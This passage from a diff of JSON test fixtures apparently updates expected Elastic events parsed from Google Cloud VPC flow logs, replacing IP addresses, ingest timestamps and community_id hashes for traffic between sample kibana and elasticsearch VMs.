"{\"insertId\":\"19im82tfdygzna\",\"jsonPayload\":{\"bytes_sent\":\"64466\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392160900Z", + "original": "{\"insertId\":\"19im82tfdygzna\",\"jsonPayload\":{\"bytes_sent\":\"64466\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:49.549471457Z", @@ -17964,18 +17964,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 174524, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 66 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:BbTL9wZeHMC/sF82yUUcW/2D6CA=", + "community_id": "1:imhAHfiL2qAfW47Jd0enQw924sA=", "bytes": 174524, "name": "default", "transport": "tcp", @@ -17997,7 +17997,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -18034,8 +18034,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869087100Z", - "original": "{\"insertId\":\"19im82tfdygzng\",\"jsonPayload\":{\"bytes_sent\":\"174524\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392166400Z", + "original": "{\"insertId\":\"19im82tfdygzng\",\"jsonPayload\":{\"bytes_sent\":\"174524\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", "end": "2019-06-14T03:49:37.965294083Z", @@ -18064,17 +18064,17 @@ "as": { "number": 16509 }, - "address": "203.0.113.228", + "address": "67.43.156.13", "port": 9243, "bytes": 181624065, - "ip": "203.0.113.228", + "ip": "67.43.156.13", "packets": 28344 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:arV4D7RJIpRwsrWa/m7Q9mUVaPI=", + "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", "bytes": 181624065, "transport": "tcp", "type": "ipv4", @@ -18088,7 +18088,7 @@ }, "related": { "ip": [ - "203.0.113.228", + "67.43.156.13", "10.49.136.133" ] }, @@ -18113,8 +18113,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869089900Z", - "original": "{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"203.0.113.228\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392171800Z", + "original": "{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.183499423Z", "end": "2019-06-14T03:49:58.592579489Z", @@ -18141,17 +18141,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51348, "bytes": 1460, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:B8rl49fY7/3p7swViLnHkXbZpvs=", + "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", "bytes": 1460, "transport": "tcp", "type": "ipv4", @@ -18165,7 +18165,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, @@ -18190,8 +18190,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869092900Z", - "original": "{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392177300Z", + "original": "{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:41:20.630975303Z", "end": "2019-06-14T03:41:20.754300982Z", @@ -18214,9 +18214,9 @@ "as": { "number": 4837 }, - "address": "192.0.2.12", + "address": "192.168.2.12", "port": 44128, - "ip": "192.0.2.12" + "ip": "192.168.2.12" }, "source": { "address": "10.73.186.17", @@ -18230,7 +18230,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RFaj1p+IkzecdvmvndE30lJ6hLs=", + "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -18245,7 +18245,7 @@ "related": { "ip": [ "10.73.186.17", - "192.0.2.12" + "192.168.2.12" ] }, "gcp": { @@ -18266,8 +18266,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869095900Z", - "original": "{\"insertId\":\"19im82tfdygzoa\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.0.2.12\",\"dest_port\":44128,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"end_time\":\"2019-06-14T03:45:22.081121292Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392182800Z", + "original": "{\"insertId\":\"19im82tfdygzoa\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.12\",\"dest_port\":44128,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"end_time\":\"2019-06-14T03:45:22.081121292Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:22.080963433Z", "end": "2019-06-14T03:45:22.081121292Z", @@ -18288,10 +18288,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -18305,7 +18305,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BbTL9wZeHMC/sF82yUUcW/2D6CA=", + "community_id": "1:imhAHfiL2qAfW47Jd0enQw924sA=", "bytes": 11137, "name": "default", "transport": "tcp", @@ -18328,7 +18328,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -18364,8 +18364,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869098700Z", - "original": "{\"insertId\":\"19im82tfdygzn7\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"95\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392188500Z", + "original": "{\"insertId\":\"19im82tfdygzn7\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"95\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", "end": "2019-06-14T03:49:37.965294083Z", @@ -18386,9 +18386,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 54812, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -18402,7 +18402,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:iNSkH+XbFsPOGDVjlyGh+11nIrk=", + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -18417,7 +18417,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -18441,8 +18441,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869101600Z", - "original": "{\"insertId\":\"19im82tfdygznf\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":54812,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392194Z", + "original": "{\"insertId\":\"19im82tfdygznf\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":54812,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", "end": "2019-06-14T03:45:20.708994883Z", @@ -18463,10 +18463,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33564, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -18480,7 +18480,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:50u5lJ2RV1XFEhO2zdhxvcEDnVw=", + "community_id": "1:PtUpNPLEJul/LK9u2JbGqtTKFB8=", "bytes": 21792, "name": "default", "transport": "tcp", @@ -18503,7 +18503,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -18539,8 +18539,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869104500Z", - "original": "{\"insertId\":\"19im82tfdygzni\",\"jsonPayload\":{\"bytes_sent\":\"21792\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"186\",\"reporter\":\"SRC\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392199500Z", + "original": "{\"insertId\":\"19im82tfdygzni\",\"jsonPayload\":{\"bytes_sent\":\"21792\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"186\",\"reporter\":\"SRC\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", "end": "2019-06-14T03:49:59.597079770Z", @@ -18563,9 +18563,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 49438, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -18579,7 +18579,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:XQBVj/qvQirewgJk7seie1WKY/s=", + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", "bytes": 74370, "transport": "tcp", "type": "ipv4", @@ -18594,7 +18594,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -18618,8 +18618,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869107400Z", - "original": "{\"insertId\":\"19im82tfdygzns\",\"jsonPayload\":{\"bytes_sent\":\"74370\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":49438,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"580\",\"reporter\":\"SRC\",\"rtt_msec\":\"114\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-s